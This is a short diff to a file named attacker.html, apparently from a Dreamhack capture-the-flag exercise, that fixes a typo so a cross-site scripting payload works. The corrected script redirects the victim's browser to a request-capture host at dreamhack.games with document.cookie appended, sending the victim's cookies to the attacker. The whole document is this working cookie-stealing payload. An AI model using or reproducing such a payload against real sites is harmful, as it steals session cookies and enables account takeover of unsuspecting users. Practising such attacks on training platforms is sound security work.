--- a/attacker.html
+++ b/attacker.html
@@ -1,3 +1,3 @@
 <script>
-  location.herf="https://vjtlgfe.request.dreamhack.games"+document.cookie
+  location.href="https://vjtlgfe.request.dreamhack.games"+document.cookie
 </script>
